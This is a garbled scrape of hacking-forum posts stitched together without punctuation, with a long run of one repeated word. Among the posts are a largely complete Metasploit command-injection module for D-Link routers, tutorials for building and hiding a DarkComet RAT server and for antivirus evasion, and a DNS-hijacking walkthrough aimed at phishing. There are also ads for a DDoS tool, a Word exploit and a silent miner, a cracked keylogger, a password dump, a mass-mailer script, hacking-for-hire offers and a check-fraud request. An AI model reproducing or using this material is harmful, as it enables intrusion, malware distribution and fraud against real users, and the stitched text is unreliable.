phoenix wrote what the language the application delphi added keys support from avlock gold. 
tip avlock gold generate unique client key after installation base hwid and other bypass client key and disable trial. 
have found this random site don't know works but says offers available your country can someone bypass download anyhow and send thanks lot. 
zynga poker chips generator. 
this generator transfers chips your zynga poker account fully tested and working guaranteed sweetcornhacks. 
nice search for this bug many time. 
cheatsheets penetration testing security cheatsheets that have collated over the years. 
let the dog see the rabbit plz. 
tthanks bro qwe sadqwe. 
yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines yardlines. 
doe wrote freebitcoin win free bitcoins every hour win free bitcoins multiply your bitcoins playing win jackpots bitcoin free weekly lottery with big prizes referral commissions for life just sign for free seriously hit that button that's motivating factor. 
there are websites hides all your html source code simply with this html encrypted. 
prevent your code from being stolen other webmasters. 
hello selling legit accounts for. 
useing this sites curancy these are legit accounts have alot accounts txt document each one. 
features each one these accounts have full acsess even more sites this legit how buy. 
see that money thing right hand side yea the one with the dallor sign click donate and once you donate. 
will send you the username and password before you buy sure and tell your buying and once see you paid will reply with the usernsame and password legit account. 
color masking how use fake address there may many tutorial regarding but complied simple one for your reference. 
hope you guys find useful. 
what masking color masking hiding your original dynamic static address that you can not traced. 
masking using fake address for your machine. 
for example let assume your address. 
using masking you can make your address. 
fake address and your location becomes. 
using proxy address you can hide your. 
this can achieved the following methods set proxy address your browser use hiding tools web proxy hidemyass depending your anonymity level your proxy address. 
color color different types anonymity levels color color transparent proxy color this type proxy server identifies itself proxy server and also makes the original address available through the http headers. 
these are generally used for their ability cache websites and not effectively provide any anonymity those who use them. 
however the use transparent proxy will get you around simple bans. 
they are transparent the terms that your address exposed not transparent the terms that you not know that you are using your system not specifically configured use. 
color anonymous proxy color this type proxy server indentifies itself proxy server but does not make the original address available. 
this type proxy server detectable but provides reasonable anonymity for most users. 
color distorting proxy color this type proxy server identifies itself proxy server but make incorrect original address available through the http headers. 
high anonymity proxy this type proxy server does not identify itself proxy server and does not make available the original address. 
was wondering the same exact thing. 
i'd like see this sent from samsung using tapatalk greed wrote this tested and working silent bitcoin miner. 
features anti sandboxie vmware anubis virtualpc startup melt proxy working windows windows vista windows windows download below reply sent from samsung using tapatalk. 
thanx man bro nice post. 
jos gandos sekali enak tenan. 
great that the best way that. 
thx for this bro. 
apologize this the wrong section for this. 
hidden content you must reply see this content. 
checking see what's out there. 
local root exploit code define gnu source include. 
define ksym name len struct sym entry unsigned long long addr unsigned int len unsigned char sym static struct sym entry table static unsigned int table size table cnt static unsigned long long text stext etext sinittext einittext sextratext eextratext static int all symbols static char symbol prefix char int token profit the table that holds the result the compression unsigned char best table unsigned char best table len static void usage void fprintf stderr usage kallsyms all symbols symbol prefix. 
exit this ignores the intensely annoying mapping symbols found arm elf files and. 
static inline int arm mapping symbol const char str return str strchr atd str str str. 
static int read symbol file struct sym entry char str char sym stype int fscanf llx addr stype str eof skip line fgets str return sym str skip prefix char symbol prefix char str symbol prefix char sym ignore most absolute undefined symbols. 
strcmp sym text text addr else strcmp sym stext stext addr else strcmp sym etext etext addr else strcmp sym sinittext sinittext addr else strcmp sym einittext einittext addr else strcmp sym sextratext sextratext addr else strcmp sym eextratext eextratext addr else toupper stype 'a' keep these useful absolute symbols strcmp sym kernel syscall via break strcmp sym kernel syscall via epc strcmp sym kernel sigtramp strcmp sym return else toupper stype 'u' arm mapping symbol sym return exclude also mips elf local symbols instead. 
else str return include the type field the symbol name that gets compressed together len strlen str sym malloc len sym fprintf stderr kallsyms failure unable allocate required amount memory exit exit failure strcpy char sym str sym stype return static int symbol valid struct sym entry symbols which vary between passes. 
passes and must have identical symbol lists. 
the kallsyms symbols below are only added after pass they would included pass when all symbols specified exclude them get stable symbol list. 
static char special symbols kallsyms addresses kallsyms num syms kallsyms names kallsyms markers kallsyms token table kallsyms token index exclude linker generated symbols which vary between passes sda base ppc sda base ppc null int int offset skip prefix char symbol prefix char sym symbol prefix char offset all symbols not specified then symbols outside the text and inittext sections are discarded all symbols addr stext addr etext addr sinittext addr einittext addr sextratext addr eextratext return corner case. 
discard any symbols with the same value etext einittext eextratext they can move between pass and when the kallsyms data are added. 
these symbols move then they may get dropped pass which breaks the kallsyms rules. 
addr etext strcmp char sym offset etext addr einittext strcmp char sym offset einittext addr eextratext strcmp char sym offset eextratext return exclude symbols which vary between passes. 
strstr char sym offset compiled. 
return for special symbols strcmp char sym offset special symbols return return static void read map file while feof table cnt table size table size table realloc table sizeof table table size table fprintf stderr out memory exit read symbol table table cnt table cnt static void output label char label symbol prefix char printf. 
globl symbol prefix char label else printf. 
globl label printf talgn symbol prefix char printf symbol prefix char label else printf label uncompress compressed symbol. 
when this function called the best table might still compressed itself the function needs recursive static int expand symbol unsigned char data int len char result int rlen total while len data the table holds single char that the same the one are looking for then end the search best table best table len result total else not recurse and expand rlen expand symbol best table best table len result total rlen result rlen data len result return total static void write src void unsigned int off unsigned int best idx unsigned int markers char buf ksym name len printf include. 
printf bits per long printf define ptr. 
quad printf define algn. 
align printf else printf define ptr. 
long printf define algn. 
align printf endif printf. 
data provide proper symbols relocatability their text' relativeness. 
the symbol names cannot used construct normal symbol references the list symbols contains symbols that are declared static and are private their. 
any other object from referencing them. 
output label kallsyms addresses for table cnt toupper table. 
sym 'a' printf tptr text llx table. 
addr text else printf tptr llx table. 
addr printf output label kallsyms num syms printf tptr table cnt printf table offset markers that give the offset the compressed stream every symbols markers malloc sizeof unsigned int table cnt markers fprintf stderr kallsyms failure unable allocate required memory exit exit failure output label kallsyms names off for table cnt xff markers off printf. 
sym printf off table. 
len printf output label kallsyms markers for table cnt printf tptr markers printf free markers output label kallsyms token table off for best idx off expand symbol best table best table len buf printf. 
asciz buf off strlen buf printf output label kallsyms token index for printf. 
short best idx printf table lookup compression functions count all the possible tokens symbol static void learn symbol unsigned char symbol int len int for len token profit symbol symbol decrease the count for all the possible tokens symbol static void forget symbol unsigned char symbol int len int for len token profit symbol symbol remove all the invalid symbols from the table and the initial token count static void build initial tok table void unsigned int pos pos for table cnt symbol valid table pos table pos table learn symbol table pos. 
len pos table cnt pos replace given token all the valid symbols. 
use the sampled symbols update the counts static void compress symbols unsigned char str int idx unsigned int len size unsigned char for table cnt len table. 
sym find the token the symbol memmem len str continue decrease the counts for this symbol's tokens forget symbol table. 
sym len size len idx size memmove size len size break find the token the symbol memmem size str while table. 
len len increase the counts for this symbol's new tokens learn symbol table. 
sym len search the token with the maximum profit static int find best token void int best bestprofit bestprofit best for token profit bestprofit best bestprofit token profit return best this the core the algorithm calculate the best table static void optimize result void int best using the symbol last allows compress symbols use standard fast string functions for this table slot empty not used actual original char code best table len find the token with the breates profit value best find best token place the best table best table len best table best xff best table best xff replace this token all the valid symbols compress symbols best table start placing the symbols that are actually used the table static void insert real symbols table void unsigned int memset best table sizeof best table memset best table len sizeof best table len for table cnt for table. 
sym best table best table len static void optimize token table void build initial tok table insert real symbols table when valid symbol not registered exit error table cnt fprintf stderr valid symbol. 
exit optimize result int main int argc char argv argc int for argc strcmp argv all symbols all symbols else strncmp argv symbol prefix char argv skip symbol prefix char else usage else argc usage read map stdin optimize token table write src return. 
lifetime crack hide all hide all the worlds best hide software hide all your applications and games from snoopers hackers allows you surf anonymously prevent identity theft and guard against hacker intrusions all just need click. 
features change your address change your location encrypt all transfer data remote dns lookups acces internet bbc etc support almost all apliications games unique support udp applications unique support http servers unique have portable version safety browse technology unique support hide win. 
metro apps reduce your game ping low lag what new fix not response bug some machines. 
fix exclude firefox chrome not take effect bug. 
how crack unpack and install completely uninstall and remove previous version including registry items unpack and copy loader amd original setup. 
installation directory run loader admin done. 
seriously hit that button that's motivating factor hidden content you must reply see links hidden content you must reply see links don't think necessary for virus scan but for who skeptical here hidden content you must reply see links ejlidibi xepnt hodbfygjeqaqmg. 
wrote lets try this thank for sharing nce still working. 
maxisploit this good vulnerable scanner easy for use. 
sri harsha wrote really need this too need this. 
thank you very much will try now. 
hidden content you must reply see links security vulnerability facebook business manager endpoint allows third party application hack any facebook page with limited permissions and the victim will permanently lose admin access the page. 
default facebook application interface not allow third party applications add modify page admin roles page roles like manager editor analyst etc. 
third party applications are allowed perform all the operations like post statuses your behalf publish photos etc. 
except adding admin roles because application allowed add remove admins then could add some user admin the page and remove the actual owner permanently. 
the other hand there endpoint for business pages called which allows add remove page admin roles who are already handling the facebook business. 
following request would make target user admin the page. 
com content length role manager user business access token response true after some minutes testing got know that removing the business parameter from the request didn't throw any error and allow add anyone new page admin and delete the actual page admin non business page where the application has manage pages permission. 
that's whatever the application may having manage pages permission the admin then could hack all your facebook pages fraction seconds. 
final proof concept you are unable understand then please watch this video. 
embed code for this video. 
insertbefore fjs document 'script' 'facebook jssdk'. 
com xter videos hacking facebook pagesanother serious vulnerability hacking facebook pagesstatus fixedreward usdproof concept hidden content you must reply see links. 
com xter xter wednesday august page takeover request post. 
com content length role manager user access token response true removing victim request delete. 
com content length user access token response true thats all target page hacked reported this vulnerability facebook security team and completely fixed now. 
they rewarded usd part their bug bounty program. 
even though they placed fix for this vulnerability please aware the permissions you grant any applications. 
permissions dialog box would look like this hidden content you must reply see links manage pages requested please note that this app would able manage your pages post statuses publish photos etc. 
don't worry you can still modify the permissions you have granted other apps hidden content you must reply see links. 
wanna see hidden content. 
your tut really wonderful bro. 
but would suggest that there just one cracking package which the gita bible quran reversing and that tutorials from lena. 
the best tutorials you will ever get package. 
for the beginners and reference guide for even intermediaries. 
love and you want you too can download from here code url. 
php dir rce tutorials lenas reversing for newbies file reversing. 
rar url hope you not feel offended. 
thanks for your tut and continue post. 
hello ihf found new way encrypt everyfile just with winrar. 
will fud why will show you later this thread will long and please post keep thread alive really works with everyfile such darkcomet. 
net files executables and every other files. 
pics music but mostly you don't need encrypt music haha. 
first download winrar hidden content you must reply see links then install. 
now should ready for use. 
first here you have your server. 
exe now select you server and add winrar archive. 
make sure you check self extracting solid archive and protect archive for changes they should called like this dont know because use winrar other language than english. 
for always use best but does not matter. 
then advanced add directory extract temp add the path where should extract the files then execute after extracting add server. 
exe the name your virus trojan etc. 
now navigate mode check hide all would recommend this because will completely invisible the victims machine. 
last update check overwrite all files. 
now just click and are almost ready next step goto select password use every password you want but remember this will need later. 
and generate the file case server. 
exe now you just need understand used password and winrar encrypts the file for. 
how decrypt and run this file follow next steps. 
open notepad and write the name you encrypted archive here the password here the directory you used before extract the files. 
exe pabc temp and save attention something. 
bat otherwise the whole process wont work. 
now you have both files the last step open again winrar and add these both encrypter. 
sfx exe files archive check the boxes like before like the pic. 
like the pic and like before did again click. 
now are finished and should look have made this procedure with darkcomet rat and scanned afterwards. 
was wondered this the reason why just king kaspersky. 
hope could explain and show you the method good professionel would. 
this thread was really long and the process takes the beginning much time but can this now minute and did for some months. 
but now want share with you. 
know this method wouldnt fud for long time after this thread but does not matter. 
and sry guys had more pictures but wasnt allowed post more than pics. 
maybe will video too. 
please say thanks this took long time. 
this tut made thm. 
gingerbread older you should use hidden content you must reply see links because pptp broken. 
hidden content you must reply see links step the wireless and network settings. 
click your phone's menu button choose settings then tap the wireless and network settings button. 
this menu might look quite bit different depending the android handset you are using however the wireless and network settings should fairly universal. 
only one option allows you set the vpn connection. 
the next screen tap the vpn settings button step select pptp for the vpn connection now tap the add vpn button. 
the screen will display list various types vpns. 
tap the add pptp vpn button continue. 
step configure the vpn connection vpn name give your vpn name for the connection listing. 
set vpn server you will need the actual address for your vpn connection. 
enable encryption you should untick this option. 
normally recommended enable encryption but because hidden content you must reply see links you need disable encryption. 
step connect securitykiss server now your vpn set it's time connect. 
this back the vpn listings window and tap the vpn you just created order make the connection. 
enter your username client and password once you make successful connection you will see key icon your notification area indicating you are connected vpn. 
thanks much for the tut. 
dagu magu wrote awsome guy can tell how dash. 
gif its easy bro. 
get access cpanel can control webmail. 
let's that should nice. 
hello all today want give you for the first time version ddos distributed denial service powerful and for free created only for you the program was created with visual basic and very fast especially the attacks mattzddos it's project born for satisfy and help who haven't got good experience about the hacking ddos and black hat fact semi automatic and require only the website url with the time the attack and the port. 
connect the servers for attacks with simple button and the attack. 
this program has various attacks methods like tcp spoofed udp spoofed ack spoofed syn spoofed http http proxy ovh drop screenshot. 
obviously being tool for perform ddos attacks you will see that the file will releived from antivirus but don't worry clen and safe. 
use guide download the program from this link. 
com file ytqnf run the. 
exe and insert the thextob the victim's website url and insert the time seconds and the port attack. 
the program for educational purposes the author the forum and the administrators doesn't take any responsability about the use the program. 
thanks bro it's big help. 
pratham wrote hello guys here back with new crack. 
want share with you latest crack patch internet download manager also called idm. 
description internet download manager idm very useful download acceleration tool with file segmentation technology accelerate your downloads video music document and other important files. 
idm increases download speed five times with resume and schedule capacity. 
comprehensive error recovery and resume capability will restart broken interrupted downloads due lost connections network problems computer shutdowns unexpected power outages are outstanding for individuals. 
seamless integration into major browser like microsoft internet explorer firefox google chrome opera considered very useful and through which idm handles your downloads automatically. 
attach config attach download thank you. 
can see your post. 
thank you man for this. 
hope this works and for that thanks this post totally fake. 
swapnil haxor wrote how watch youtube videos for only without having account. 
first need link video. 
for example i'll using this one url now this url moral the story and how use the very end the video link youtube just add code and you'll able watch. 
hidden content you must reply see links hacked thanks brother. 
thanks for the post this will good learn alot. 
credits wlit api implanta works flawless any address currently bugs known. 
thankj for the link hope this works. 
let check out and know what. 
thanks fpr sharing only for month. 
below the download link hide reply. 
evubcayb hcmbwr pfzuszkbj hboust slpthvrzjl hide reply. 
thanks man lemme check out. 
microsoft word exploit this exploit will convert your virus from. 
its coded from scratch and used private method assure great stability and long lasting fud time. 
office exploit dedicated all those who are looking for easy way infect. 
you can now easily attach your virus yahoo gmail hotmail and other related email providers. 
almost every user has microsoft office their computer that you can sure infect huge range people. 
exploit works any version office and any version windows. 
features easy use unsaturated method you can spread facebook work chatrooms and emails. 
price above click here buy payment option bitcoin and perfect money. 
hope it's good thank you. 
this tested and working silent bitcoin miner. 
features anti sandboxie vmware anubis virtualpc startup melt proxy working windows windows vista windows windows download below hidden content you must reply see this content. 
thanks for sharing bless you. 
good and thanks lick. 
adk nad lnz vlzk. 
this looks cool thank you think already have one. 
wrote yea you heard correct its leaked not believe take look the link enjoy mike baghu. 
reply see the content. 
good stuff will check out thanks. 
need someone that sells check samples bank information write checks. 
please contact here yahoo. 
shitty logo yeah know well you're here for the program. 
codefire wrote guys this tut rat don't rough summary code downloading config port forwarding set the end lets begin downloading you will need all these download them duh direct download and that's pretty much. 
okay here you are going signup once that done here and fill out like wrote the image. 
now that you have your host duc that you just downloaded. 
after that just check the box like here save. 
now were done with config now open darkcomet after that simply put random port anything valid. 
i'll use remember what you put leave the rest. 
okay now are going port forward and leave the rest for later port forwarding good now here tricky for some people. 
isn't all just follow what need your gateway open cmd. 
exe and type ipconfig without the yes it's french there and enter. 
the logins could admin and password admin root. 
normally you can have other ways access. 
said the picture and for the look here and now complete the. 
you've just port forwarded set now back darkcomet click darkcomet rat server module full editor exert now follow completely what wrote the images then and and finally the end now you finally have your server. 
nevertheless you can't give people like idiot yet lol it's detectable avs you need crypter you kind find lots here this forum try customize change icon bind make something clever yet simple it's the end have fun now and took hour and half make this will take you sec say thanks don't shy there okay thank. 
internet wrote hidden content you must reply see linksfacebyte facebook account scraper. 
friend request bomber too requests hour nice post. 
cool does anybody knows cheap way make usbkiller. 
connect with part finish logout hidden content you need reply see the link the shittiest thing this website. 
everyone wants the link therefore everyone replies but when one need help regarding the thread she wont find any because noone bother see all the comments because all the comments are just trash and usefull information can found. 
the thread good people will take interest why this forcefulness just increase shitty comment numbers. 
get rid this idiotic idea because its killing your website and its reputation. 
legit for your own sake. 
owasp appsec tutorial series episode cross site scripting xss the third episode the owasp appsec tutorial series. 
this episode describes the attack the owasp top cross site scripting xss. 
this episode illustrates three version xss attack high level detailed with the script tag and detailed with script tag and then recommends resources for further learning. 
stay tuned will upload more tuts soon. 
neo video youtube rqsnf. 
com watch rqsnf feature channel list video. 
pls update the download link thx. 
impressive info thanks lot. 
what are the packs exploit packs are distributed via web encrypted bundle tipically signed gzip file and contain additional modules that plug directly into exploit pack. 
installation usually simple just expand the desired tree and get all the arsenal you need. 
give some ammo your weapons upgrading exploit pack with packs. 
regular pack smart collection exploits this simple and small pack that contains selection exploits and using this set you will able conduct pentest and test target against the latest that affect the following platforms windows linux unix and mac osx. 
professional pack the real deal more than. 
exploits this pack contains all the exploits you could find out there this full set exploits and using you can sure that your pentest will come unstoppable. 
all the platform includeds windows linux unix minix sco solaris osx etc. 
and even mobile and web attacks. 
here the list passwords free download you didn't get success using the above password list then you can get the uniqpass dictionary file from. 
get the uniqpass dictionary file from here. 
get the uniqpass dictionary file from here thanks mate. 
are using mitm and sniffing method will work only the victim your network. 
does this method still work. 
still working well will try now and edit. 
thank you for sharing this awesome tool. 
very nice share good job. 
hanks for this good tut. 
code this file part the metasploit framework and may subject redistribution and commercial restrictions. 
please see the metasploit web site for more information licensing and terms use. 
com require 'msf core' class metasploit msf exploit remote rank include msf exploit remote include msf auxiliary commandshell def initialize info super update info info 'name' link devices remote command execution' 'description' different link routers are vulnerable command injection via the web interface. 
the vulnerability exists tools vct. 
xgi which accessible with credentials. 
this module has been tested with the versions dir rev. 
two target are included the first one starts telnetd service and establish session over the second one runs commands via the cmd target. 
there wget tftp client upload elf backdoor easily. 
according the vulnerability discoverer more link devices may affected. 
vulnerability discovery and metasploit module 'juan vazquez' minor help with msf module 'license' msf license 'references' 'osvdb' 'edb' 'bid' 'url'. 
adv 'apr 'privileged' true 'platform' 'linux' 'unix' 'payload' 'disablenops' true 'targets' 'cmd' all devices 'arch' arch cmd 'platform' 'unix' 'telnet' all devices default target 'arch' arch cmd 'platform' 'unix' register options optstring. 
new 'username' true 'user login with' 'admin' optstring. 
new 'password' false 'password login with' 'admin' self. 
class end def exploit user datastore 'username' datastore 'password'. 
nil pass else pass datastore 'password' end test login user pass target. 
name cmd exploit cmd else exploit telnet end end def test login user pass print status rhost rport trying login with user pass login path login. 
php valid login response includes the following login check. 
php begin res send request cgi 'uri' login path 'method' 'post' 'vars post' action post login login user user login passwd pass login log res. 
nil fail with exploit failure unknown rhost rport could not connect the webservice response end res. 
fail with exploit failure unknown rhost rport could not connect the webservice check the server banner end res. 
code fail with exploit failure unknown rhost rport could not connect the webservice error end res. 
body login check print good rhost rport successful login user pass else fail with exploit failure unknown rhost rport successful login possible with user pass end rescue rex fail with exploit failure unknown rhost rport could not connect the webservice end end def exploit cmd not datastore 'cmd' fail with exploit failure badconfig rhost rport only the cmd generic payload compatible end res request payload. 
headers 'server' alpha webserv fail with exploit failure unknown rhost rport unable execute payload end print status rhost rport blind exploitation unknown exploitation state return end def exploit telnet telnetport rand vprint status rhost rport telnetport telnetport cmd telnetd telnetport starting the telnetd gives response request cmd begin sock rex socket. 
create tcp 'peerhost' rhost 'peerport' telnetport. 
sock print good rhost rport backdoor service has been spawned handling. 
add socket sock else fail with exploit failure unknown rhost rport backdoor service has not been spawned end print status attempting start telnet session rhost telnetport auth info host rhost port telnetport sname 'telnet' user pass source type exploit active true report auth info auth info merge 'userpass file' nil 'user file' nil 'pass file' nil 'username' nil 'password' nil start session self telnet rhost telnetport merge false sock rescue fail with exploit failure unknown rhost rport backdoor service has not been spawned end return end def request cmd uri tools vct. 
xgi' begin res send request cgi 'uri' uri 'vars get' 'set runtime switch getlinktype' 'set runtime diagnostic pingip' cmd 'pingip' 'method' 'get' return res rescue rex fail with exploit failure unknown rhost rport could not connect the webservice end end end. 
i'm new this website. 
would like hire hacking services hack email account facebook account and possible iphone. 
hidden content you must reply see links can't connect that site. 
what have here thanks for the share sent from using tapatalk. 
internet wrote facebyte facebook account scraper. 
friend request bomber too requests hour nice woerk. 
this awesome thank you much. 
doe wrote dracula keylogger full version cracked one the best keyloggers out there. 
seriously hit that button that's motivating factor spent time cracking this for you guys please rate positive you enjoy don't think necessary for virus scan but for who skeptical here. 
thanks alot keep work bro. 
thx ill check this out guys. 
yea you heard correct its leaked not believe take look the link hidden content you must reply see this content enjoy mike. 
codefire wrote havij automated sql injection tool that helps penetration testers find and exploit sql injection web page. 
the success rate more than injection vulnerable targets using havij. 
how use this tool for exploiting sql injection bugs web application. 
for using this tool you should know little about sql injections. 
enter target url and select http method then click analyze. 
note try url valid input that returns normal page not error page. 
lets hope for the best sent from using tapatalk. 
it's nice desperate check out thanks. 
not pay codefire will rip you off pay him btc and didnt give carbon formgrabber you pay him will rip you off. 
true that codefire could rip anyone here despite his good reputation. 
the world finish then please codefire you have explain why you have not given him what paid for about subscribe your services but with this information think afraid now. 
you need explain why you have not given him the formgrabber. 
demand for explanation please. 
you are matter here. 
please help copy and paste this message and your message his public post and advice not pay him can even give you btc pay confirmation you know his ripper actually pay codefire because his reputation then what now did was block public post about what has done profile had open new one and this warning all new beginers abeg scammers what out for code. 
dont believe show off but today doing attach config attach attach config attach cheers mike. 
zwiady robisz kim jeste jak nazywasz wrzucisz publicznie forum znalaz google. 
name the company aurora website code url. 
com url name the cracked software aurora. 
type release serial note the software are good for web designing and making funky graphics. 
download link cracks code url. 
would like see this works. 
thank you for the way. 
nice tutorial interesting boss thanks. 
hey want too please send the link also blink thanks advance blink. 
wrote thanks for the code. 
biokinetix wrote huge email password dump sharing with you all huge email and password dump got hands about year ago. 
even though its year old there are lots still uncracked. 
have manage crack many these passwords myself but theres just way i'm gonna them all. 
hashed the passwords are hashed you will need hash password cracking tools like hascat this. 
download dump download this download huge password list for use hash cracker enjoy and please say thanx. 
thanks lot will definetily gonna check this out. 
details http connection keep alive content type text html content length cache control cache must revalidate date mon jan gmt expires mon jan gmt pragma cache server webcamxp this called scada. 
scada supervisory control and data acquisition type industrial control system ics link webcam color warning color this post for educational purpose don't try this. 
stay safe thank you thnx. 
codefire wrote very simple and easy way earn month with investment. 
i'll happy give you the method. 
all you have download one small piece software and let run the background your computer. 
it's completely autopilot you don't even have ever really anything with and doesn't degrade computer performance. 
you can make everyday soon you start. 
you can make more you invest but that's you. 
all your money earned for the day automatically updated online. 
here's the link get started. 
get your free thread just sign with that link and make sure verify your account via sms start earning. 
use you want quickly get number that will work for this you can put anything for the info when you first start the app. 
you may have submit tickets the trial and support departments and through one time verification but then you should earning perfectly. 
have fun let know you want more info and i'll happy help. 
you've already heard about that suggest somewhat similar but another incredibly easy way make money. 
sheargab wrote which the best have lot listijzjsbsksn hzjsisns. 
wow looking for this. 
codefire wrote hidden content you must reply see links shitty logo yeah know well you're here for the program. 
url thx for the leak. 
johnsmith wrote hacked server with some odd websites. 
can you find way bypass computer that has restrictions basically everything including external exe's and all programs booting from hard drive has been locked and there has been administrator password set all bios setups and such the only thing unblocked the internet hardly nearly every website blocked and some core programs already built into the computer can open command prompt via python its core program for computing however instantly closes itself even you manage open booting from usb isn't option either they are apparently disabled until you actually log onto the computer. 
would try social engineering key logger and calling tech come and log however that not option usb slots are disabled until you actually log. 
said this will really challenging kudos anyone who can figure out way bypass this. 
codefire wrote cool credits wlit api implantation works flawless any address currently bugs known. 
looking for someone hack word press membership site the internet marketing niche. 
then upload all the training modules into the cloud drive mega. 
what soft codefire sir its just amazed. 
ice fog hackers are ice fog hackers are seasoned and professional hackers. 
way giving back the world are here help with all hacking jobs some which are hack into any school database and change university grades matter how secured. 
find out your partiner cheating. 
have learnt reverse engineering for months. 
wanna discover vulnerability for bughunting. 
lamp wrote thanks for sharing its awesome. 
happy see this tutorial all those tutorials youtube are extremely confusing and half the time don't even work thank you. 
gotta get creds somehow. 
good working thnks for sharing. 
would like have bitcoins for the very first time. 
thank you man good kaskd. 
dns hacking hijacking tutorial this introduction dns poisoning which also includes example quite nifty application using the experiment. 
purely educational not responsible for how you use the information. 
start you need computer running linux ubuntu case basic understanding how the domain name system dns works. 
note that this more advanced topic don try this you don know what you doing. 
why dns the dns provides way for computers translate the domain names see the physical ips they represent. 
when you load webpage your browser will ask its dns server for the the host you requested and the server will respond. 
your browser will then request the webpage from the server with the address that the dns server supplied. 
can find way tell the client the wrong address and give them the malicious server instead can some damage. 
malicious dns server want send clients malicious web server first need tell them its and need set malicious dns server. 
the server selected dnsmasq its lightweight and the only one that works for this purpose that found install dnsmasq ubuntu run sudo apt get install dnsmasq other distributions linux use the appropriate package manager. 
once you installed you can and edit the configuration file etc dnsmasq. 
conf sudo gedit etc dnsmasq. 
conf the values there should sufficient for most purposes. 
what want hard code some ips for certain servers want spoof the format for this address host for example address facebook. 
the your malicious web server save the file and restart dnsmasq running sudo etc init. 
dnsmasq restart you now have dns server running which will redirect requests for facebook. 
malicious web server you probably already have web server installed. 
this pretty basic won cover here. 
there are couple things you can with the web server. 
will getting all the traffic intended for the orignal website the most likely cause action would set some sort phishing site presume you know how that though another alternative set some sort transparent proxy which logs all activity. 
might come back this the future. 
can your dns server plz alternative instead spoof webserver set metasploit browser autopwn module. 
you can have lots fun with that but how you get victim well this where project the experiment could come handy you don know the experiment basically harvests people ips through websites such forums and scans them for open ports. 
surprising number these ips have port open and more often that not that leads straight router configuration mini site. 
admin and password will get you far life its fairly easy login and change the dns settings. 
recommended use website obfuscate html code such. 
thanks man really excited. 
this tool really work but need wordlist for cracking. 
now share you cracking tools and them will give you wordlist creator python version. 
coder reiluke scanner results. 
wanna try out wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
this simple guide read somebody else facebook messages without any effort cheers mike did have reply here can see how works thanks. 
thanks you for the guide. 
really really want look this content. 
what codes are they thanks. 
lets see theyu are anu good thanks. 
new and would like see all this site contains. 
guys wanted share with you all new inbox mailer script hope enjoy php value str. 
rawurlencode value return str function lrtrim string return stripslashes ltrim rtrim string isset post 'action' query str post parse str sslclick lrtrim sslclick action lrtrim action message lrtrim message emaillist lrtrim emaillist from lrtrim from reconnect lrtrim reconnect epriority lrtrim epriority smtp lrtrim smtp ssl port lrtrim ssl port smtp username lrtrim smtp username smtp password lrtrim smtp password replyto lrtrim replyto subject lrtrim subject realname lrtrim realname file name lrtrim file urlz lrtrim urlz contenttype lrtrim contenttype message urlencode message message ereg replace message message urldecode message message stripslashes message subject stripslashes subject not found. 
style font family geneva arial helvetica sans serif font size. 
style font size font family geneva arial helvetica sans serif private mailer. 
server setup smtp login smtp pass port optional smtp server smtp ssl server yes reconnect after emails you dont have smtp login leave blank queries above message setup your email your name reply email priority please choose high normal low subject attachments plain html alert 'please complete all fields before sending your message. 
die class smtp smtp server port var int var smtp port smtp reply line ending var string var crlf sets whether debugging turned var bool var debug the level debug perform sets verp use off default off var bool var verp false access private var smtp conn the socket the server var error error any the last call var helo rply the reply the server sent for helo initialize the class that the data known state. 
access public return void function smtp this smtp conn this error null this helo rply null this debug connection functions connect the server specified the port specified. 
the port not specified use the default smtp port. 
tval specified then connection will try and established with the server for that number seconds. 
tval not specified the default seconds try the connection. 
smtp code success smtp code failure access public return bool function connect host port tval set the error val null there confusion this error null make sure are not connected this connected are connected what should for now will just give error saying are already connected this error array error already connected server return false empty port port this smtp port connect the smtp server this smtp conn fsockopen host the host the server port the port use errno error number any errstr error message any tval give after secs verify connected properly empty this smtp conn this error array error failed connect server errno errno errstr errstr this debug echo smtp error. 
this crlf return false sometimes the smtp server takes little longer respond will give longer timeout for the first read windows still does not have support for this timeout function substr php win socket set timeout this smtp conn tval get any announcement stuff announce this get lines set the timeout any socket functions second function exists socket set timeout socket set timeout this smtp conn this debug echo smtp from server. 
announce return true performs smtp authentication. 
must run after running the hello method. 
returns true successfully authenticated. 
access public return bool function authenticate username password start authentication fputs this smtp conn auth login. 
this crlf rply this get lines code substr rply code this error array error auth not accepted from server smtp code code smtp msg substr rply this debug echo smtp error. 
this crlf return false send encoded username fputs this smtp conn base encode username. 
this crlf rply this get lines code substr rply code this error array error username not accepted from server smtp code code smtp msg substr rply this debug echo smtp error. 
this crlf return false send encoded password fputs this smtp conn base encode password. 
this crlf rply this get lines code substr rply code this error array error password not accepted from server smtp code code smtp msg substr rply this debug echo smtp error. 
this crlf return false return true returns true connected server otherwise false access private return bool function connected empty this smtp conn sock status socket get status this smtp conn sock status eof hmm this odd situation. 
the socket valid but are not connected anymore this debug echo smtp notice. 
eof caught while checking connected this close return false return true everything looks good return false closes the socket and cleans the state the class. 
not considered good use this function without first trying use quit. 
access public return void function close this error null there confusion this helo rply null empty this smtp conn close the connection and cleanup fclose this smtp conn this smtp conn smtp commands issues data command and sends the msg data the server finializing the mail transaction. 
msg data the message that send with the headers. 
each header needs single line followed with the message headers and the message body being seperated and additional. 
implements rfc data smtp code intermediate data. 
smtp code success smtp code failure smtp code failure smtp code error access public return bool function data msg data this error null confusion caused this connected this error array error called data without being connected return false fputs this smtp conn data. 
this crlf rply this get lines code substr rply this debug echo smtp from server. 
rply code this error array error data command not accepted from server smtp code code smtp msg substr rply this debug echo smtp error. 
